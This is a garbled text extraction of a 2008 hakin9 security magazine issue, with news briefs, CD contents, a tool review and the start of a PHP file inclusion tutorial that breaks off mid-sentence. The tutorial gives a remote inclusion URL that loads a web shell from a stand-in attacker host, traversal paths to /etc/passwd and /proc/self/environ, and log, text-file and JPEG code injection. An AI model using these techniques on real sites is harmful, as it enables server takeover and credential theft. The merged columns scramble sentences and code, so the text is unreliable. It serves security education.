Attack and Its Practical Aspect

CONTENTS CONTENTS

team

Editor in Chief: Ewa Dudzic [email protected] Executive Editor: Magda Błaszczyk [email protected] Editorial Advisory Board: Matt Jonkman, Clement Dupuis, Shyaam Sundhar, Terron Williams, Steve Lape Editors: Monika Drygulska [email protected], Sylwia Stocka [email protected]

DTP Management: Robert Zadrożny [email protected] Hacking the Time DTP: Ireneusz Pogroszewski [email protected] Art Director: Agnieszka Marchocka [email protected] CD: Rafał Kwaśny [email protected] inally the summer has arrived. I hope we all do not get too lazy and can get ourselves together to work efficiently. People always wait for Proofreaders: Neil Smith, Steve Lape, Michael Munt, Monroe Dowling, Kevin Mcdonald, John Hunter something, don’t they? Some of us wait for the summer to come, some Top Betatesters: Joshua Morin, Michele Orru, Clint Garrison, Shon F Robinson, Brandon Dixon, Justin Seitz, Donald Iverson, Matthew Sabin, – just for the weekend. Why is it? Perhaps, we wish to make the time go faster Stephen Argent, Aidan Carty, Rodrigo Rubira Branco, Jason Carpenter, Martin Jenco, Sanjay Bhalerao, Monroe Dowling or, at least, pretend it does. The sense of time flow is so relative that it changes

Senior Consultant/Publisher: Paweł Marciniak [email protected] along with our emotions, mood and, unfortunately, expectations. Can we actually Production Director: Marta Kurpiewska [email protected] influence the time? There are scientists who have been trying to modify the time Marketing Director: Ewa Dudzic [email protected] Circulation and Distribution Executive: Wojciech Kowalik and those who are trying to manipulate the way we experience the time flow. [email protected] Subscription: [email protected] They say: babies and children have no feeling of time passing. We acquire the

Publisher: Software Media LLC habit of perceiving time in a certain way, depending on which culture we grow (on Software Publishing House licence www.software.com.pl/en) up in. Most people in the West are so attached to linear time that we they do not Postal address: Publisher: Software Wydawnictwo Sp.z.o.o realize it. Some cultures, however – for instance, some Native Americans – do 02-682 Warszawa, ul. Bokserska 1 Worldwide publishing not learn to experience time the same way as the rest of the world. They live in Business addres: Software Media LLC 1521 Concord Pike, Suite 301 Brandywine timelessness and I guess should be much happier. Executive Center Wilmington, DE 19803 USA Phone: 1 917 338 3631 or 1 866 225 5956 A practice proving how strange and flexible is the time is the www.hakin9.org/en season time change rule still applied in some countries. And so, Software Media LLC is looking for partners from all over the World. Poles, Germans and the other inhabitants of Europe sleep one hour If you are interested in cooperating with us,please contact us at: [email protected] less or more (depending on the time of the year) while the Indians or Japanese do not bother with anything like that. It is thought to be an Print: 101 Studio, Firma Tęgi Printed in Poland electricity saving method from a bygone era but nowadays the time

Distributed in the USA by: Source Interlink Fulfillment Division, change seems to be more problematic than useful. 27500 Riverview Centre Boulevard, Suite 400, Bonita Springs, FL 34134, Tel: 239-949-4450. Dear Readers, instead of counting days that are left to the holidays Distributed in Australia by: Gordon and Gotch, Australia Pty Ltd., or to the weekend – relax, focus on your actions and emotions and Level 2, 9 Roadborough Road, Locked Bag 527, NSW 2086 Sydney, Australia, Phone: + 61 2 9972 8800, not on the clock ticking. Then turn the page, and the next one and

Whilst every effort has been made to ensure the high quality of another and enjoy hakin9 articles and tutorials. First, read about FI the magazine, the editors make no warranty, express or implied, attack and its practical aspect. Then learn something new on dangers concerning the results of content usage. All trade marks presented in the magazine were used only for of the wireless networks presented by Stephen Argent and move to the informative purposes. All rights to trade marks presented in the magazine are reserved by second part of the series on Alternate Data Streams. We also have a the companies which own them. To create graphs and diagrams paper on RSS for you, written by Aditya Sood, as well as two articles we used program by in the defense section: last part of the Postgres database security

Cover-mount CD’s were tested with AntiVirenKit series plus a short paper on Deploying Robustness Testing. When you by G DATA Software Sp. z o.o The editors use automatic DTP system have enough of reading, explore the hakin9 CD and enjoy a new video, Mathematical formulas created by Design Science MathType™ Metasploit3 GUI with Postgres created by Lou Lombardy and Stephen ATTENTION! Selling current or past issues of this magazine for prices that are Argent’s tutorial on Man in the Middle attacks. different than printed on the cover is – without permission of the publisher – harmful activity and will result in judicial liability. I hope you enjoy this edition of hakin9 magazine. Should you ever have any suggestions or ideas to improve h9 – do let me know. hakin9 is also available in: Spain, Argentina, Portugal, France, Morocco, Belgium, Luxembourg, Canada, Germany, Austria, Switzerland, Poland, Czech, Slovakia, Singapore, The Netherlands, Australia, The United States

hakin9 magazine is published in 7 language versions:

DISCLAIMER! Magdalena Błaszczyk The techniques described in our articles may only be [email protected] used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

4 HAKIN9 4/2008 4/2008 HAKIN9 5 CONTENTS CONTENTS

BASICS REGULARS 06 In Brief 12 File Inclusion Attacks Selection of news from the IT security ALI RECAI YEKTA, ERHAN YEKTA world. After reading this article, you will come to know about File Inclusion Attacks' Zinho & www.hackerscenter.com methods and defense techniques against them. 08 CD Contents What's new on the latest hakin9.live CD – a great number of fully functioning ATTACK versions and special editions of commercial applications and a video 20 Hacking RSS Feeds: tutorial on Metasploit GUI in a Windows Insecurities in Implementing RSS Feeds XP environment.. ADITYA K. SOOD hakin9 team This paper discusses the infection vectors that occur due to insecure coding by developers and includes other related security issues. It provides a detailed 10 Tools analysis of the errors and efficient measures to correct those errors, while eScan ISS from MicroWorld keeping in mind the original security concerns. Anushree Reddy

30 Alternate Data Streams or “Doctor Jekyll and Mr. 68 Emerging Threats Hyde” Move to NTFS (Part II) Global Thermonuclear War – Shall We LAIC AURELIAN Play a Game? The second part of the ADS series. This article reveals everything you should Matthew Jonkman know about ADS, focusing on its practical use. You will learn how to create, use and delete ADS. 70 Consumers Test Choose the Right Router 36 All in Memory Execution under Linux Matthew Sabin & hakin9 team. ANTHONY DESNOS, FRÉDÉRIC GUIHÉRY, MICKAËL SALAÜN A very useful paper on all in memory execution under Linux. The authors show 74 Interview its rules, all in memory's tools and protection methods against the execution. Interview with Nicolaas Vlok Terron Williams 46 The Real Dangers of Wireless Networks STEPHEN ARGENT 78 Self Exposure The paper explains how to break into Wireless Networks and use Ettercap, Mike Chan, Bing Liu Driftnet and Wireshark for sniffing. While reading this article, you will learn how hakin9 team to manipulate packets and view MSN conversations over the network. 80 Book Review IT Security Interviews Exposed. Secrets to Landing Your Next Information DEFENSE Security Job Benjamin Aboagye 56 How to Deploy Robustness Testing Risks, Controls, and Security: Concepts MIKKO VARPIOLA, ARI TAKANEN and Applications, 1st Edition In this article the authors explore various means of testing for the security Joshua F. Morin mistakes, with the focus on deploying robustness testing into the software development lifecycle. 82 Coming Up Topics that will be brought up in the 60 Protecting Data in a Postgres Database upcoming issue of hakin9 ROBERT BERNIER Monika Drygulska Part III of the three-part series on Postgres. This article addresses the issue of restricting access to data via the use of data encryption. After reading this paper, you will manage to use cryptographic functions obtained from two contributions modules.

4 HAKIN9 4/2008 4/2008 HAKIN9 5 IN BRIEF

iceberg, said David Murphy, author of the Operating System Microsoft addresses ATM MACHINES EASILY HACKED, digged story, on his blog. But it is enough 5 new critical remote exploitation DO YOU NEED MONEY? to know what (not) to do with your pics. flaws. These flaws can lead to privilege When the SQL Slammer worm shut down escalation and code execution. The flaws over 10,000 ATM's belonging to Bank of are related to Internet Explorer, Office and America there was a big surprise in the (FIXED) GOOGLE XSS EXPOSES ALL Windows and all the Security Bulletins security industry. Nobody would have YOUR GOOGLE ACCOUNTS regarding the recent Critical advisories are suspected that such important machines XSS is a nightmare for any web application marked as privately reported. were being powered by Windows PC's developer. On his blog at xs-sniper.com, Multiple third party applications have connected to the Internet. Billy Rios shows how he managed to also been found to be vulnerable to remote Now, once again, researchers have inject and run Javascript from a Google code execution including Quicktime demonstrated the possibility of stealing spreadsheet. Guest star of the hack is and Opera for Windows Vista platforms. the sensitive information that card holders Internet Explorer that renders text/plain Patches were released or scheduled for entered into ATM's by hacking them with a as active content thus executing the April-May 08. Windows 0 day exploit. Martin Macmillan, html/Javascript carried with the server business development director with ATM response. The proof of concept provided security specialist Level Four Software, by Billy involves the injection of stealing- PRO-TIBETAN WEBSITES said that Banks have preferred to use cookie Javascript code in the first cell TARGETED BY CHINESE HACKERS common operating systems, like Windows, of a spreadsheet being linked as a CSV Is it another attempt at Cyber Warfare ? to give intelligence to ATM's thus exposing document and carried with Content-type Chinese hackers have been taking over them to the same risks of a home PC. set to text/plain by Google. The exploit is pro-Tibetan sites. Keeping them secure translates into possible because Google forgot to set The attackers used known security regular software updates and patching. Content-disposition to attachment that flaws in a number of Microsoft Office But further security problems due to poor would have avoided IE showing the content products. Similar attacks using Microsoft design implementations in which only the as inline. The exploit is fairly dangerous Office exploits occurred in 2006 and PIN is encrypted while card numbers and because of the way Google handles 2007, forcing Microsoft to issue a number expiration dates are sent in the clear. In the cookies: Google cookies are set for all of patches and fixes. According to Mikko end the number of ATM's, counting all of google.com subdomains, exposing Gmail, Hypponen, the chief research officer for those small machines not under the direct Code and all other big G's services at risk. F-Secure, most attacks were launched control of the Banks, makes it very difficult Google has already fixed the issue, from Chinese IP addresses. The hacks for any large scale solution to work and but the way browsers handle Content- were highly successful and in one work in a timely fashion, to prevent the 0 type headers is still a playground for web instance a defense contractor went to day attacks. – another tough one! application researchers. F-Secure for help and discovered that one compromised Windows computer had been sending information to a server in SEND A BEER IM MONITORED BY BUSINESSES ! mainland China for 18 months. So far it TO PARIS THROUGH FACEBOOK Under proposed changes by the is unknown how much information about Facebook was not designed with security federal government, businesses will be pro-Tibetan activities got to the Chinese in mind. Their creators were not overly granted authority to intercept e-mail and attackers. concerned with security when it was just an instant messages. All Internet based I'm on web website for American teenagers. communications, including instant Nowadays Facebook holds private messages and e-mails, will be intercepted UN-SUPPORTING TIBET, information about popular TV names as by employers without permissions. The WITH A ROOTKIT well as millions of members whose privacy reason for such changes is taking counter- Race for Tibet is a malicious rootkit. Not just is not well preserved. terrorism measures to stop hackers another supporting the Pro-Tibetan cause. One of the most digged stories of the from stealing sensitive information, said The Flash movie shows a scorned Chinese past months was just about Facebook Austrailian Attorney-General and MP Robert gymnast at the Olympic games being and the simplicity with which not-so-elite McClelland. But Dale Clapperton, Electronic scored 0 despite of his good performance. hackers managed to expose private Frontiers Australia chair, said that the new McAfee has confirmed that many websites images just playing with the Facebook law implies an infringement on privacy. supporting Tibet have been modified to web application parameters. Using a web exploit known as well as 0 day Windows browser and limited hacking skills, it was vulnerabilities in order to install keyloggers possible to set others' moods, send gifts, MORE REMOTE and malwares on the computers of visitors expose pictures and so on, anyone with EXPLOITS FOR VISTA to the sites. The RaceForTibet.exe rootkit Firefox and a couple of Firefox add-ons can Three weeks after the release of Service was discovered by Patrick Comiotto of feel like a hacker. This is just the tip of the Pack 1 for the most secure Microsoft Avert Labs, whose reverse-engineering

6 HAKIN9 4/2008 IN BRIEF

analysis showed the hook of Windows API's displays by 30 top sponsors in a relaxed involved into Keyboard management. The setting including industry leaders Microsoft, keystroke log file dopydwi.log, was located Cisco, Google and new startups. Briefings in the windows system directory and the tracks include many updated topics plus IP address where this file was sent was an the always popular ones including Zero unknown server located in...China! Day Attacks/Defenses, Bots, Application Security, Deep Knowledge and Turbo Talks. Register early for the best rates. SPAMMERS MOVING www.blackhat.com TOWARDS GMAIL & YAHOO Spammers, the worst kind of people using the Internet, are trying to escape from the UPCOMING SANS TRAININGS IP blacklisting cage by pretending to be If you are suffering from a beach deficit, common Gmail & Yahoo users. Having wrap up your plans to meet your 2008 their mails carrying a trusted IP address training goals before the summer slips would dramatically increase the success past. Attend SANS Virginia Beach 2008, hit rate of email delivery. Moreover, in the August 21 - 29, and get the best in Internet past 6 months all the major CAPTCHA and Application security education systems have been broken, and automated with world-class instructors and great cracking tools created. It seems like a networking opportunities! Work on your tan scary scenario for the future. The fight during lunch every day! against botnets and the creation of strong You'll be taught by the best instructors captcha systems will become the most in the industry - seasoned professionals critical challenge for the next years. who are able to use their real-world experiences to demonstrate the practical value of the course material. After a week WHEN HACKERS ARE HACKED with SANS, you'll have gained a wealth In the past few months there have been of knowledge and skills you can apply many discussions about hackers being to improve security immediately upon hacked back through the tools they returning to work. use. The trend is steady and increasing. www.sans.org More and more tools advertised in the most notorious hackers and security professionals mailing lists and websites IT SECURITY WORLD hide keyloggers or even rootkits. CONFERENCE & EXPO Penetration testing tools and brute forcers Featuring 7 focused tracks, 10 in-depth seem the most infected. While at the workshops, one Summit on Virtualization beginning this appeared as the attempt and a technology-rich expo jam-packed of hackers to hack other hackers, some with 70+ technology and service providers, rumors and some (reverse engineering) IT Security World 2008 (September 15-17) findings uncovered that the authorities may is heralded as the west coast's most be behind this infection. With this new tactic comprehensive information security event! and new anti hacking-tools laws enforced In addition to its industry-neutral tracks in some European countries, tracking back delivering hard-hitting, technical training, IT hacking tools consumers through rootkits Security World offers three specific security can be the ultimate proof of crime. summits in the following industries: finance, healthcare and the government sector. IT Security World 2008 promises new BLACK HAT EVENT strategies to overcome perennial problems, Attend Black Hat USA, August 2-7 in Las as well as progressive techniques to solve Vegas, the world's premier technical your most pressing pain-points such event for ICT security experts. Featuring as VoIP, NAC, denial of service attacks, 40 hands-on training courses and 80 Evil Twin threats, buffer overflows, global Briefings presentations with lots of new communication and much more! content and new tools. Network with 4,000 www.misti.com delegates from 50 nations. Visit product

6 HAKIN9 4/2008 HAKIN9.LIVE

CD CONTENTS hakin9 magazine always comes with a CD. At the beginning it was based on hakin9.live distribution, then we decided to cooperate with BackTrack team and use their distro as an engine.

akin9 CD contains some useful Advanced Office Password Breaker VIDEO TUTORIALS hacking tools and plugins from – breaks passwords and unlocks Metasploit on Windows by Lou Lombardy h BackTrack. Most of hackers know documents instead of performing lengthy – in this tutorial we will show you how to it well – BackTrack is the most top rated password recovery. It unlocks password- use the new Metasploit GUI in a Windows Linux live distribution focused on penetration protected Microsoft Word documents and XP environment. Using Metasploit we testing. Every packet, kernel configuration and Excel spreadsheets within a guaranteed will scan a target, save the results, and scripts in BackTrack are optimized to be used timeframe. Special version. then obtain a shell session on the target by security penetration testers. This CD is Retail price: USD 49.00 machine. You will need to have a Windows based on BackTrack 3 beta version. To start www.elcomsoft.com XP machine and a target machine. using hakin9.live simply boot your computer Advanced Outlook Password Recovery – The latest Metasploit 3.1 framework for from the CD. To see the applications, recovers passwords (including multilingual Windows and the Postgres Database code listings and tutorials only, you do not ones) to protected Personal Storage will need to be installed on the Windows need to reboot the PC – you will find the Files (*.pst) used by Microsoft Outlook (all XP machine. You will also need the SQL adequate folders simply exploring the CD. versions: 97, 98, 2000, XP, 2003, 2007 statements included on the CD. beta) to store emails, contacts etc. Special The author of the video, Lou Lombardy, APPLICATIONS version. has been working in the IT field for You will find the following programs in Retail price: USD 29.00 over a decade. He is the founder of Applications directory on hakin9 CD: www.elcomsoft.com NibblesAndBits (www.NibblesAndBits.biz), My ADS – program that completes the article Advanced PDF Password Recovery a computer forensics company based in on Alternate Data Streams by Laic Aurelian. – unlocks PDF documents and remove Atlanta, GA, and is an instructor for Vigilar’s The file that you will find on the CD is the editing, printing and copying restrictions Intense School. setup that installs MyADS.exe, a full program instantly. Open encrypted and password- Man in the Middle Attack video developed by Laic Aurelian exclusively for protected PDF documents quickly and by Stephen Argent – it is an extra addition hakin9.The author also provided a VB script efficiently. Special version. to the article on wireless networks that is related to the ADS article. Retail price: USD 39.00 voulnerabilities Stephen wrote. It can be www.elcomsoft.com found in Wireless_MITM.wmv directory. The Outpost Antivirus Pro (OAV) from Agnitum Advanced WordPerfect Office video demonstrates a basic MiTM attack Ltd. – high-speed, proactive anti-virus. It Password Recovery – guarantees from setup to execution, with a few slightly provides fast and efficient virus protection the recovery of protected documents more advanced concepts. to keep your computer clean of malware created with any product and any as well as a comprehensive anti-spyware version of Corel WordPerfect Office. CODE LISTINGS to safeguard your personal data. It is a Special version. As it might be hard for you to use the license for 6 months of full-fledged antivirus Retail price: USD 39.00 code listings printed in the magazine, we updates. It can be installed on 3 PCs. www.elcomsoft.com decided to make your work with hakin9 Retail price: USD 15.00 Easy Drive Data Recovery from Munsoft much easier. We placed the complex code www.agnitum.com – can be used to recover data from listings from the articles on the CD. You will Advanced Lotus Password Recovery from corrupted or accidentally formatted find them in folders named adequately to Elcomsoft – can be used to recover lost or disks. The program uses powerful unique the articles titles. forgotten passwords for files/documents algorithms that even allow the recovery created in the Lotus applications. Special of files that are not present in file system version. entries. Full version for 1 year. Retail price: USD 25.00 Retail price: USD 29.95 If you wish a program or a tool developed by you to appear on hakin9 CD, e-mail [email protected]. www.elcomsoft.com www.munsoft.com

8 HAKIN9 4/2008 If the CD contents can’t be accessed and the disc isn’t physically damaged, try to run it in at least two CD drives.

If you have experienced any problems with this CD, e-mail: [email protected] TOOLS

eScan ISS from MicroWorld

Virus has always been a daily problem for the end users. System is on vulnerable state as soon as they are turned on. Which means, when they do file share with other computer’s or over the Internet, they tend to be even more vulnerable to the viruses on loose in the Internet. This being the case, users who depend on information technology and computer system for many different purposes would like to have a toolkit that takes of all their headache to trace and find viruses within a system. More than finding one, it is best to quarantine and log the entire process of virus scans. Figure 2. Scanning Window System: Windows License: Commercial Quick Start the user starts the scan. eScan is updated on a Application: eScan Installation is very simple as they are very similar regular fashion and it makes it very easy for users to the Windows based installing software. It is a to do an auto-update check, where the software point-and-click installation and the software will do does everything for the users. everything else for you. Figure 1, shows the admin panel window of the eScan toolkit. It has very Advantages simple and elegant features for all kinds of users It is quick and easy for installation, performing to use the tool. It can work on scheduled way and scan, running updates and choosing the various always has different Active protection levels. modes of the software to run on. The manual is The users can choose the drive to scan from well structure for users who get stuck at some the On Demand window and click the “Scan” point of time, when using this software. The logs button. Once the scan is performed, a list of store every granular detail of the scan, which malwares will be logged and displayed at the helps even the beginner level users to easily same time in order for the users to be aware understand the virus-infected file. It updates very of the viruses spotted on their system. Figure 2, frequently too. shows the scanning window that opens when Disadvantage In general terms, a anti-virus products will always have its limitations. We can only have signatures for a known Malware, known to the security researchers of an organization designing such products. Hence, anti-virus products cannot identify certain viruses for which it does not have the signature. This is a major disadvantage for any anti-virus software. Other than that, I did not see any other disadvantages running this product.

by Anushree Reddy, AOL Inc. Figure 1. The On Demand Admin Panel

10 HAKIN9 4/2008

BASICS

ERHAN YEKTA, ALI RECAI YEKTA File Inclusion Attacks

Difficulty

In the realm of web application vulnerabilities, file inclusion attacks are one of the most dangerous. What makes this type of attack so dangerous?

epending on how secure the server is, techniques. By do doing this the attacker would be able to run commands or compromise files on This code includes the contents of config.php. You the system. All that has to be done is place a web can also include the files in a dynamic way that

shell (i.e. c99shell, r57shell) on the server thus allows you to include variables and change them giving the attacker control of the website or the just like you want to: server if it is not well protected.

A person attacking the server using a web be edited which could be used to perform a

number of operations including: changing the Annotation: if the value of register globals start page or setting a login-script to send the in the php.ini is set to off, the variable login information of all the people who logged $page will not be treated as a super global in to the site. The attacker could also gain variable and therefore it cannot be changed access to the database to see and potentially via URL. The include statement will have to

modify and/or delete all the user information. be $ _ GET['page'], $ _ POST['page'], $ _ WHAT YOU WILL Having a web shell on a website could have or LEARN... REQUEST['page'] $ _ COOKIE['page'] fatal consequences for a website as well as the instead of $page. What File Inclusion Attacks are server. In this case $page is a variable that can The real danger of the attacks Many websites work with databases as their be included any file, only the URL has to be How to find vulnerabilities and means of displaying data. Instead of typing the changed to support it. If you want to include exploit them connection information for the database in every downloads.html (the file should exist), you will Developing defense techniques against File Inclusion Attacks page a file is created which contains the login have to type index.php?page=downloads.h information. tml and press Enter. Now you can include any WHAT YOU SHOULD This file is included in web pages and is file. If the file in the include statement does not KNOW... a very convenient way to maintain database exist, you get a warning-error but the script will Good PHP Knowledge connections, because all you have to do to still work. In addition to the include statement, Apache Webserver basics connect to the server is to write just one line you also can use require, require _ once, Linux Basics code: or include _ once. Require works almost like

12 HAKIN9 4/2008 FILE INCLUSION ATTACKS

include the only difference is, that if the yes, then we change the URL and include index.php?page=robots.txt and see an file does not exist, you get a fatal-error robots.txt. We open www.example.com/ announcement similar to this one: and the script breaks. Require _ once will check if the file is included already. If not, then the file will be included. The check in require _ once prevents a file from being included several times in a script. Include _ once works just like require _ once. It checks if the file was included already, if not it is going to try to include the file. When a file does not exist, a fatal-error report is produced and the script breaks.

Finding File Inclusion Vulnerabilities There are two ways to find file inclusion vulnerabities; White-Box Testing and Black- Box Testing.

White Box Testing Figure 1. c99Shell Screenshot White-Box Testing is when you have access to the source code of the website. A lot of Content Management Systems (CMS) are open source. This means their source code is available for everyone. We have to look for an include statement, which includes variables and not files. For example include($page); If the variable is not protected by any safety mechanisms then we have found a vulnerability.

Black-Box Testing Finding a vulnerability of non-open-source systems by using Black-Box Testing is more difficult, because we do not access Figure 2. Finding Vulnerabilities via Google Code Search to the source code, but it is still possible. If the URL of a website is like www.example.com/index.php?page=dow nloads.html, we have to play with the URL until we receive an error. We can change the name of the file we want to include.

We type /index.php?page=somethi ng.html and open the page. Warning: include(something.html) [function.include]: failed to open stream: No such file or directory in /home/seite/public_html/ index.php on line x. If we receive such an error, we again can include any file. What do we do if PHP does not show any error messages? A lot of websites have a robots.txt in their main directory, which is usually for search engines. But we are going to use it. First of all we type www.example.com/ robots.txt to make sure, that the file exists. If Figure 3. File Inclusion Attack – example

4/2008 HAKIN9 13 BASICS

User-agent: Mediapartners-Google* Google Codesearch lang:php (include|require)( _ Disallow: User-agent: * Disallow: With Google Codesearch it is possible once)?\s*['"(]?\s*\$ _ admin.php Disallow: /admin/ to search for the source code of (GET|POST|COOKIE) and we have already Disallow: /images/ Disallow: specific programs or scripts. In Google found a vulnerable script yap 1.1 /includes/ Disallow: /themes/ Codesearch you can use regular The vulnerable Code is in line 60 of expressions to make the search easier. We index.php in the admin folder (See Figure And it worked again. If robots.txt does not use Google Codeserach in order to find 2). exist, you have to try to include other files vulnerable CMS, which have File Inclusion on the server. (/etc/passwd or something vulnerabilities. We type this regular if (isset($_GET['page'])) else) expression: { include($_GET['page'].".php"); Listing 1. /etc/passwd content }

root:x:0:0:root:/root:/bin/bash Here the script checks if the variable $ _ GET['page'] exists. If yes then a file bin:x:1:1:bin:/bin:/sbin/nologin with the name of the variable if going to daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin be included. And since the variable is not lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin protected, we have our first vulnerability. sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown Null-Byte halt:x:7:0:halt:/sbin:/sbin/halt By using the include statement, you also mail:x:8:12:mail:/var/spool/mail:/sbin/nologin can include files with specific endings. news:x:9:13:news:/etc/news: This looks like: include( ); gbr:x:9:13:gbr:/etc/gbr: $page.".html" uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin we cannot include /etc/passwd, because ... all files receive automatically the ending

Listing 2. Send a request to the server .html. /etc/passwd becomes /etc/ passwd.html and such a file does HTTP/1.1\r\n"); passwd.html" "/etc/ fputs($fp, "Host: 127.0.0.1\r\n\r\n"); passwd"); while(!feof($fp)){ $res .= fgets($fp, 128); Exploiting } Now that we have seen how to find echo $res; vulnerabilities we are going to exploit them. There are two ways to exploit the ?> vulnerabilities by including remote files and Listing 3. Save inputs into txt-file local files

Remote File Inclusion (RFI) '; include remote files. By doing this it echo 'E-Mail Address'; is possible to place a web shell on echo ''; the vulnerable server. To exploit a RFI- echo ''; echo ''; vulnerability, it is not necessary to have special programming skills. This means if(isset($_POST['submit'])){ that everybody, who has a little experience $data = $_POST['email']; with File Inclusion will be able to attack $fp = fopen("data.txt","a+"); $wr = fwrite($fp,$data); the web application. All the attacker has to fclose($fp); do is to replace the file, which should be } included, with the address of the web shell. ?> In practice, this looks like:

14 HAKIN9 4/2008

BASICS FILE INCLUSION ATTACKS

http://www.example.com/ save sometimes the login information could edit or delete records, after he index.php?page=http:// in files like config.inc and protect them connects to the database. www.hackerexample.com/shell.txt? with .htaccess files. You can easily Websites, which are considered to be The content of the shell.txt is included bypass this protection by typing http: more secure, protect the admin panel and and running now. In the shell.txt we could //www.example.com/index.php?page=con other sensitive files with .htaccess files. run PHP-commands like Then the PHP-command config.inc. web servers like Apache. With .htaccess runs and we see the configuration of If you have the login information, then files you are able to protect your files with php.ini. (See Figure 3) you can connect to the database, if the password, deny access or create your database does not have any protection own error pages. To protect admin.php Local File Inclusion (LFI) like login only from local host. An attacker with a password, use the code below. If the value of allow _ url _ fopen in the php.ini is set to off, then we cannot include any remote files, only local files. But we can use Local File Inclusion to gain access to the system. It is more complicated than RFI, because we have to manipulate the local files in order to run PHP-commands.

Reading sensitive files By using LFI, we are able to read sensitive files like /etc/passwd, /etc/group, httpd.conf Figure 4. Sending a request to a server via fsockopen() or any important system/configuration file. All we have to do is open the files via the URL. We can choose between relative or absolute paths. LFI Example: In this example the browser is pointed to either http: //www.example.com/index.php?page=/ etc/passwd (absolute path) or index.php?page=../../../../etc/ passwd (relative path) producing the following results: see Listing 1. On Linux servers the usernames are saved in the /etc/passwd file. After the attacker has obtained the usernames, an attempt to break in using brute force FTP, Telnet or SSH passwords will be performed. If the passwords are not shadowed, then they will also be Figure 5. Injecting PHP Code via access_log contained in the /etc/passwd. Shadow passwords are usually found in /etc/ shadow but only the root-user has the permission to read them. A shadowed password looks like: example:$1$kpg8WuKS$XV9XFCFikmU9UPc/ c.QEe0:13472:0:99999:7:::

If the attacker can read /etc/shadow, then he will have the passwords. They just have to brute force them locally. This is much faster than trying to brute force the SSH or FTP password remotely. Websites which work with databases Figure 6. Hiding PHP Code in JPEG

16 HAKIN9 4/2008 4/2008 HAKIN9 17 BASICS FILE INCLUSION ATTACKS

AuthUserFile /home/example/ same directory as admin.php. Only the force them. A lot of people use the same public_html/.htpasswd username will be saved in the .htaccess- password for multiple accounts, that AuthGroupFile /dev/null file, the password will be saved in means the probability is very high, that the AuthName "Authorization Required" .htpasswd-file and looks like this: .htpasswd passwords also used for SSH, AuthType Basic admin:IJdjhBiwf/PGc FTP, Telnet, etc. Usually you cannot access the Httpd.conf is a configuration-file require user admin .htaccess and .htpasswd via a URL, for Apache. An attacker can get a lot of because they are hidden files. But an information about the system by reading attacker can read them through LFI. this file. You need to save the code above The passwords in the .htpasswd file are The location of the file depends on the as .htaccess and it should be in the encrypted, but the attacker can brute Apache installation or operating system. Usually the file is saved in /etc/httpd/conf/ or /usr/local/apache/conf/ in Linux. At Listing 4. SQL Injection Protection the bottom there are a few settings from

$ip = 'IP: '.$_SERVER['REMOTE_ADDR']; $time = 'Date: '.date("d.m.y - H:i:s"); ErrorLog /usr/local/apache/logs/ $ref = 'Referer: '.$_SERVER['HTTP_REFERER']; error_log $browser = 'Browser: '.$_SERVER['HTTP_USER_AGENT']; if(eregi('UNION',$REQ) && eregi('SELECT',$REQ)){ CustomLog /usr/local/apache/logs/ $fp = fopen("attacks.txt","a+"); access_log fwrite($fp,"$REQ\n $ip\n $time\n $browser\n $ref\n"); ServerName example.com fclose($fp); DocumentRoot /home/example/public_html

header('Location: http://www.google.com'); } The location of the both files error _ log and access _ log are very important for ?> an attack. An attacker needs to find their Listing 5. SQL Injection protection Log location usually with the use of automatic scripts. In this case the attacker will get Array their location through reading httpd.conf ( file. [id] => UNION SELECT [lang] => english Normally there are a lot of different [whostmgrrelogin] => no websites on a single server. All of the ) URL’s of the various websites and their path on the server will be saved in the IP: 123.123.123.123 Date: 29.07.07 - 17:17:26 httpd.conf file. This information is enough Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.5) Gecko/20070713 for an attacker. An attacker can find a Firefox/2.0.0.5 LFI vulnerability on a website and upload Referer: his picture with PHP code on another Listing 6. Content of /proc directory website on the server. After he uploads his picture via the URL his PHP code will dr-xr-xr-x 3 root root 0 Jul 30 16:05 10705/ be executed. dr-xr-xr-x 3 root root 0 Jul 30 16:05 11217/ dr-xr-xr-x 3 nobody nobody 0 Jul 30 17:00 1314/ http://www.example1.com/ .. index.php?page=/home/example2/public_ html/images/php.jpg -r--r--r-- 1 root root 0 Jul 30 17:15 cmdline -r--r--r-- 1 root root 0 Jul 30 17:15 cpuinfo -r--r--r-- 1 root root 0 Jul 30 17:15 crypto PHP Code in Log Files -r--r--r-- 1 root root 0 Jul 30 17:15 devices The activities of each visitor on a website Listing 7. Opening /proc/self/environ via Firefox will be saved in log files. By reading the log files a webmaster can see WHO, and HTTP_HOST=example.com WHEN they had access to the files on his HTTP_KEEP_ALIVE=300 website. The apache log file looks like this: HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.5) Gecko/ 20070713 Firefox/2.0.0.5 127.0.0.1 - - [25/Mar/2007:19:28: REDIRECT_QUERY_STRING=page=/proc/self/environ 32 +0200] "GET /index.php HTTP/1.1" 200 160

16 HAKIN9 4/2008 4/2008 HAKIN9 17 BASICS

GET is the request-method and /index.php will be executed (See Figure 5). In most phpinfo(); ?> instead of his e-mail is the name of the file, which has been cases the log-files are called the log address and then include mailingslist.txt requested and 200 is the HTTP-Status- files access _ log or error _ log and via a URL like /index.php?page=mail Code and means, that the request was you can find their location with automatic inglist.txt and phpinfo(); and the successful. What would happen if we scripts. function will be executed. With the ability request a PHP code instead of a file likes to execute PHP code the attacker can this? PHP Code in TXT-Files send the source code of the website to Not every website works with a database. his e-mail or place a web shell for further

Sometimes a .txt file is enough to make attacks. a small mailinglist db. This is a simple An error will result, because a file with this example to show the vulnerability. You PHP Code in JPEG Picture name does not exist. The request will be also can choose another format instead A lot of digital cameras and scanners saved in the log files (See Figure 4). This of txt. In this example a visitor submits his store information about the picture in type of request cannot be made via the e-mail address with a form and his e-mail an exif header. The Exif header is stored browser, because browsers encode the will be saved in mailinglist.txt (see Listing in the JPEG picture, but you only can

